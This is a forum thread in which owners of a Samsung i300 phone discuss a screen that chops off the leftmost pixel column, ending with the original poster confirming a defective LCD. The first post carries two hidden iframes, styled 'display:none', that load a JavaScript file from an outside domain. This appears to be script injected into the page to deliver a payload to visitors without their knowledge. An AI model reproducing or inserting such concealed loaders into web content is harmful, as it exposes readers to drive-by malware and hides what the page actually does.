+ Reply to Thread
Results 1 to 11 of 11

Thread: Screen Question

  1. #1
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26

    Question Screen Question

    Depending on the application, I am losing the first column of pixels on the screen, such that all the first letters on a row get chopped in half. Is everyone else experiencing this?

    Thanks,

    Rob<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-22-2001
    Location
    NC
    Posts
    284

    Re: Screen Question

    Originally posted by Lupin
    Depending on the application, I am losing the first column of pixels on the screen, such that all the first letters on a row get chopped in half. Is everyone else experiencing this?

    Thanks,

    Rob
    Name an application or two that exhibits this so that we can check.

  3. #3
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26

    Applications that exhibit this problem

    The Blazer Browser, for one...

    Also, when I Hotsync the phone, the first half of the H on Hotsync gets cut off (not from the blue tab, but under, where it tells you that it just completed the function).

    Rob

  4. #4
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26

    Called Samsung

    I spoke to a level 2 rep at Samsung who recommended that I replace my I300... according to him, I have a bad LCD... Well, I will be waiting until I get the new phone before I send this one back....

  5. #5
    Registered User
    Join Date
    10-18-2001
    Posts
    305
    I noticed that the text in most my applications is pushed all the way left.... so that there is not a blank column of pixels before the text starts.... looks a little weird...

    is this normal?
    Attached Thumbnails Attached Thumbnails Screen Question-i300pixels.jpg  

  6. #6
    Registered User
    Join Date
    10-22-2001
    Location
    NC
    Posts
    284
    Originally posted by fikse
    I noticed that the text in most my applications is pushed all the way left.... so that there is not a blank column of pixels before the text starts.... looks a little weird...

    is this normal?
    Mine does the same. I checked a Palm Vx and it does it too. I think what you are seeing is that with the Palm Vx there is a small space between the edge pixel and the edge of the screen, and with the i300 there is no space.

  7. #7
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26
    On mine, I am actually losing the left side of the H completely.

    Rob

  8. #8
    Registered User
    Join Date
    11-03-2001
    Posts
    42
    I have the same problem--losing the pixels down the left side of the screen. Sort of like the screen was assembled too far to the left.

  9. #9
    Registered User
    Join Date
    11-02-2001
    Posts
    10
    I would agree with richard. I had a Palm Vx which was fine. I then had to replace it, and the text was all the way over, in fact I could not pick to the left of characters. It was a pain. Can you guys still pick to the left?

  10. #10
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26

    Screen Issue

    I am waiting on a new phone from Sprint that will let me know if this is something in all of these phones or just on mine.

  11. #11
    Registered User
    Join Date
    10-25-2001
    Location
    SF Bay Area
    Posts
    26

    Confirmed today

    I went to the Best Buy near me, and they had a demo. I checked it compared to my phone, and sure enough, my screen actually had a problem.

    Rob

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts